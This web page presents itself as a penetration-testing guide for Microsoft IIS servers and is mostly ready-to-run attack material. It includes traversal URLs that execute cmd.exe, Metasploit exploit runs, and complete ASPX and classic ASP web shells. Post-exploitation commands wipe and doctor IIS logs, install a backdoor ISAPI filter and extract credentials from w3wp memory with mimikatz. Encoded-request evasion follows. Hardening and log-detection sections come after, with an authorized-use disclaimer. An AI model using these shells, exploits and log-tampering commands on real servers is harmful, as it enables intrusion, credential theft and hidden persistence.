IIS Attack Vectors: Complete Penetration Testing Guide#

Internet Information Services (IIS) is Microsoft's web server that powers millions of websites worldwide. This comprehensive guide covers advanced penetration testing techniques specifically targeting IIS web servers.

IIS Architecture Overview#

Core Components#

• HTTP.sys: Kernel-mode driver handling HTTP requests
• Worker Processes (w3wp.exe): Application execution environment
• Application Pools: Isolation boundaries for applications
• ISAPI Extensions: Dynamic content processing
• IIS Manager: Administrative interface

Common IIS Versions#

• IIS 6.0: Windows Server 2003
• IIS 7.0/7.5: Windows Server 2008/2008 R2
• IIS 8.0/8.5: Windows Server 2012/2012 R2
• IIS 10.0: Windows Server 2016/2019/2022

Initial Reconnaissance#

Server Identification#

# HTTP header analysis
curl -I http://target.com
whatweb http://target.com

# Nmap HTTP enumeration
nmap -p 80,443 --script http-enum,http-headers target.com

# IIS version detection
nmap -p 80,443 --script http-iis-webdav-vuln target.com

Directory and File Enumeration#

# Common IIS directories
gobuster dir -u http://target.com -w /usr/share/wordlists/dirb/common.txt -x asp,aspx,config

# IIS-specific paths
ffuf -w iis-paths.txt -u http://target.com/FUZZ

# Configuration files
curl http://target.com/web.config
curl http://target.com/global.asax
curl http://target.com/bin/

WebDAV Detection#

# WebDAV enumeration
davtest -url http://target.com
cadaver http://target.com

# WebDAV methods testing
curl -X OPTIONS http://target.com
curl -X PROPFIND http://target.com

Common IIS Vulnerabilities#

Directory Traversal Attacks#

# Unicode directory traversal (IIS 5.0)
curl "http://target.com/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir"

# Double decode attack
curl "http://target.com/scripts/..%252f../winnt/system32/cmd.exe?/c+dir"

# Alternate data streams
curl "http://target.com/default.asp::$DATA"

Authentication Bypass#

# NTLM authentication bypass
curl -H "Authorization: NTLM" http://target.com/admin/

# Basic authentication brute force
hydra -L users.txt -P passwords.txt http-get://target.com/admin/

# Windows authentication enumeration
enum4linux target.com

ASP.NET Vulnerabilities#

# ViewState manipulation
python viewstate-decoder.py -d "viewstate_value"

# .NET framework enumeration
curl http://target.com/trace.axd
curl http://target.com/elmah.axd

# Configuration disclosure
curl http://target.com/web.config.bak
curl http://target.com/global.asax.cs

Exploitation Techniques#

WebDAV Exploitation#

# Upload malicious files via WebDAV
curl -X PUT http://target.com/shell.txt -d @shell.asp
curl -X MOVE http://target.com/shell.txt -H "Destination: http://target.com/shell.asp"

# WebDAV shell upload
msfconsole
use exploit/windows/iis/iis_webdav_upload_asp
set RHOSTS target.com
set HttpUsername username
set HttpPassword password
exploit

IIS Short Name Scanning#

# Short name enumeration
java -jar IISShortNameScanner.jar 2 20 http://target.com/

# Manual short name testing
curl "http://target.com/PROGRA~1/"
curl "http://target.com/ADMINI~1/"

Buffer Overflow Exploits#

# IIS 6.0 WebDAV buffer overflow
msfconsole
use exploit/windows/iis/iis_webdav_scstoragepathfromurl
set RHOSTS target.com
set RPORT 80
exploit

# IIS FTP buffer overflow
use exploit/windows/ftp/iis_ftp_service
set RHOSTS target.com
exploit

ASP/ASPX Code Injection#

<%
' ASP code injection
Dim objShell
Set objShell = Server.CreateObject("WScript.Shell")
objShell.Run "cmd.exe /c " & Request.QueryString("cmd")
%>

<%@ Page Language="C#" %>
<%@ Import Namespace="System.Diagnostics" %>
<script runat="server">
void Page_Load(object sender, EventArgs e)
{
    string cmd = Request.QueryString["cmd"];
    Process.Start("cmd.exe", "/c " + cmd);
}
</script>

Advanced Attack Vectors#

IIS Application Pool Attacks#

# Application pool enumeration
appcmd list apppool
appcmd list app

# Process injection into w3wp.exe
migrate -P w3wp.exe

# Application pool privilege escalation
use post/windows/escalate/service_permissions

HTTP.sys Vulnerabilities#

# HTTP.sys remote code execution
msfconsole
use exploit/windows/http/ms15_034_http_sys_webdav
set RHOSTS target.com
exploit

# HTTP request smuggling
python http-request-smuggler.py -u http://target.com

IIS Modules Exploitation#

# ISAPI filter exploitation
msfconsole
use exploit/windows/isapi/rsa_webagent
set RHOSTS target.com
exploit

# CGI exploitation
use exploit/multi/http/cgi_argument_injection
set RHOSTS target.com
set TARGETURI /cgi-bin/vulnerable.cgi
exploit

Post-Exploitation Techniques#

IIS Log Analysis and Evasion#

# Clear IIS logs
Get-ChildItem "C:\inetpub\logs\LogFiles" -Recurse | Remove-Item -Force

# Modify IIS logs
$logPath = "C:\inetpub\logs\LogFiles\W3SVC1"
Get-Content "$logPath\*.log" | Where-Object {$_ -notmatch "malicious_request"} | Set-Content "$logPath\cleaned.log"

Persistence via IIS#

# Install malicious ISAPI filter
Copy-Item "backdoor.dll" "C:\Windows\System32\inetsrv\"
Import-Module WebAdministration
Add-WebConfigurationProperty -Filter "/system.webServer/isapiFilters" -Name "." -Value @{name="backdoor";path="C:\Windows\System32\inetsrv\backdoor.dll"}

# Create malicious virtual directory
New-WebVirtualDirectory -Site "Default Web Site" -Name "backdoor" -PhysicalPath "C:\backdoor"

Memory Dump Analysis#

# Dump w3wp.exe process memory
procdump -ma w3wp.exe w3wp.dmp

# Extract credentials from memory
mimikatz "sekurlsa::minidump w3wp.dmp" "sekurlsa::logonpasswords"

# Search for sensitive data
strings w3wp.dmp | grep -i password

IIS-Specific Payloads#

ASPX Web Shell#

<%@ Page Language="C#" Debug="true" Trace="false" %>
<%@ Import Namespace="System.Diagnostics" %>
<%@ Import Namespace="System.IO" %>
<script Language="c#" runat="server">
void Page_Load(object sender, EventArgs e)
{
    string ExcuteCmd(string arg)
    {
        ProcessStartInfo psi = new ProcessStartInfo();
        psi.FileName = "cmd.exe";
        psi.Arguments = "/c "+arg;
        psi.RedirectStandardOutput = true;
        psi.UseShellExecute = false;
        Process p = Process.Start(psi);
        StreamReader stmrdr = p.StandardOutput;
        string s = stmrdr.ReadToEnd();
        stmrdr.Close();
        return s;
    }
    
    string cmd = Request.Form["cmd"];
    if (cmd != null)
    {
        Response.Write("<pre>");
        Response.Write(ExcuteCmd(cmd));
        Response.Write("</pre>");
    }
}
</script>
<HTML>
<HEAD>
<title>ASPX Shell</title>
</HEAD>
<body>
<form method="POST">
<input type="text" name="cmd" size="50" value="<%=Request.Form["cmd"]%>">
<input type="submit" value="Execute">
</form>
</body>
</HTML>

Classic ASP Shell#

<%
Dim oScript
Dim oScriptNet
Dim oFileSys, oFile
Dim szCMD, szTempFile

On Error Resume Next

Set oScript = Server.CreateObject("WSCRIPT.SHELL")
Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")

szCMD = Request.Form(".CMD")
If (szCMD <> "") Then
    szTempFile = "C:\" & oFileSys.GetTempName()
    Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
    Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0)
End If
%>

<HTML>
<HEAD>
<title>ASP Shell</title>
</HEAD>
<body>
<FORM action="" method="POST">
<input type="text" name=".CMD" size="45" value="<%=szCMD%>">
<input type="submit" value="Execute">
</FORM>
<PRE>
<%
If (IsObject(oFile)) Then
    On Error Resume Next
    Response.Write Server.HTMLEncode(oFile.ReadAll)
    oFile.Close
    Call oFileSys.DeleteFile(szTempFile, True)
End If
%>
</PRE>
</body>
</HTML>

Defense Evasion#

Request Obfuscation#

# URL encoding
curl "http://target.com/%2e%2e%2f%2e%2e%2fwindows%2fsystem32%2fcmd.exe"

# Double URL encoding
curl "http://target.com/%252e%252e%252f%252e%252e%252fwindows%252fsystem32%252fcmd.exe"

# Unicode encoding
curl "http://target.com/\u002e\u002e\u002f\u002e\u002e\u002fwindows\u002fsystem32\u002fcmd.exe"

HTTP Header Manipulation#

# X-Forwarded-For spoofing
curl -H "X-Forwarded-For: 127.0.0.1" http://target.com/admin/

# User-Agent manipulation
curl -H "User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1)" http://target.com/

# Host header injection
curl -H "Host: evil.com" http://target.com/

Security Hardening#

IIS Configuration Hardening#

# Disable unnecessary HTTP methods
Import-Module WebAdministration
Set-WebConfigurationProperty -Filter "/system.webServer/security/requestFiltering/verbs" -Name "allowUnlisted" -Value $false
Add-WebConfigurationProperty -Filter "/system.webServer/security/requestFiltering/verbs" -Name "." -Value @{verb="GET";allowed="true"}
Add-WebConfigurationProperty -Filter "/system.webServer/security/requestFiltering/verbs" -Name "." -Value @{verb="POST";allowed="true"}

# Configure request filtering
Set-WebConfigurationProperty -Filter "/system.webServer/security/requestFiltering/requestLimits" -Name "maxAllowedContentLength" -Value 30000000
Set-WebConfigurationProperty -Filter "/system.webServer/security/requestFiltering/requestLimits" -Name "maxUrl" -Value 4096
Set-WebConfigurationProperty -Filter "/system.webServer/security/requestFiltering/requestLimits" -Name "maxQueryString" -Value 2048

# Hide server information
Set-WebConfigurationProperty -Filter "/system.webServer/security/requestFiltering" -Name "removeServerHeader" -Value $true

Application Pool Security#

# Configure application pool identity
Set-ItemProperty -Path "IIS:\AppPools\DefaultAppPool" -Name "processModel.identityType" -Value "ApplicationPoolIdentity"

# Enable application pool isolation
Set-ItemProperty -Path "IIS:\AppPools\DefaultAppPool" -Name "processModel.isolationLevel" -Value "HighIsolation"

# Configure recycling conditions
Set-ItemProperty -Path "IIS:\AppPools\DefaultAppPool" -Name "recycling.periodicRestart.time" -Value "01:00:00"

SSL/TLS Configuration#

# Disable weak protocols
New-Item -Path "HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\SSL 2.0\Server" -Force
New-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\SSL 2.0\Server" -Name "Enabled" -Value 0 -PropertyType DWORD

# Configure cipher suites
New-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Cryptography\Configuration\SSL\00010002" -Name "Functions" -Value "TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384,TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256" -PropertyType String

Monitoring and Detection#

IIS Log Analysis#

# Parse IIS logs for suspicious activity
Get-Content "C:\inetpub\logs\LogFiles\W3SVC1\*.log" | Where-Object {
    $_ -match "(\.\.|\.\.\/|%2e%2e|%252e|cmd\.exe|powershell|whoami|net user)"
} | Select-String -Pattern "(GET|POST)" | Format-Table

# Monitor for WebDAV activities
Get-Content "C:\inetpub\logs\LogFiles\W3SVC1\*.log" | Where-Object {
    $_ -match "(PROPFIND|PROPPATCH|MKCOL|COPY|MOVE|LOCK|UNLOCK)"
}

Real-time Monitoring#

# Monitor w3wp.exe processes
Get-Process w3wp | Select-Object Id,ProcessName,CPU,WorkingSet,StartTime

# Monitor file system changes
Register-WmiEvent -Query "SELECT * FROM Win32_VolumeChangeEvent WHERE DriveName = 'C:'" -Action {
    Write-Host "File system change detected"
}

Automated Testing Tools#

IIS-Specific Scanners#

# IISShortNameScanner
java -jar IISShortNameScanner.jar 2 20 http://target.com/

# IIS-Shortname-Scanner
python iis_shortname_scanner.py -u http://target.com/

# Nikto web scanner
nikto -h http://target.com/ -Tuning 1,2,3,4,5,6,7,8,9,0

Custom Scripts#

#!/usr/bin/env python3
import requests
import sys

def test_iis_vulnerabilities(target):
    """
    Test common IIS vulnerabilities
    """
    vulnerabilities = [
        "/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir",
        "/scripts/..%252f../winnt/system32/cmd.exe?/c+dir",
        "/default.asp::$DATA",
        "/_vti_bin/",
        "/web.config",
        "/global.asax"
    ]
    
    for vuln in vulnerabilities:
        try:
            response = requests.get(f"{target}{vuln}", timeout=10)
            if response.status_code == 200:
                print(f"[+] Potential vulnerability: {vuln}")
                print(f"    Status: {response.status_code}")
                print(f"    Length: {len(response.content)}")
        except requests.RequestException as e:
            print(f"[-] Error testing {vuln}: {e}")

if __name__ == "__main__":
    if len(sys.argv) != 2:
        print("Usage: python3 iis_scanner.py <target_url>")
        sys.exit(1)
    
    target = sys.argv[1]
    test_iis_vulnerabilities(target)

Conclusion#

IIS penetration testing requires understanding both the web server architecture and Windows-specific attack vectors. Key areas to focus on include:

• Configuration weaknesses: Default settings and misconfigurations
• Application vulnerabilities: ASP/ASP.NET specific issues
• Authentication bypasses: Windows authentication weaknesses
• File system access: Directory traversal and file disclosure
• WebDAV exploitation: Upload and execution capabilities

Best Practices for Testers#

1. Comprehensive enumeration: Use multiple tools and techniques
2. Version-specific testing: Target known vulnerabilities for specific IIS versions
3. Application-aware testing: Understand the hosted applications
4. Post-exploitation focus: Leverage Windows-specific techniques
5. Documentation: Provide clear remediation guidance

Remediation Priorities#

1. Patch management: Keep IIS and Windows updated
2. Configuration hardening: Follow Microsoft security guidelines
3. Access controls: Implement proper authentication and authorization
4. Monitoring: Deploy comprehensive logging and alerting
5. Network segmentation: Isolate web servers from critical systems

References#

• Microsoft IIS Security Documentation
• OWASP Web Security Testing Guide
• NIST SP 800-44 Guidelines for Securing Public Web Servers
• CIS Microsoft IIS Benchmark

---

This content is for educational and authorized testing purposes only. Always ensure you have proper permission before conducting any security testing.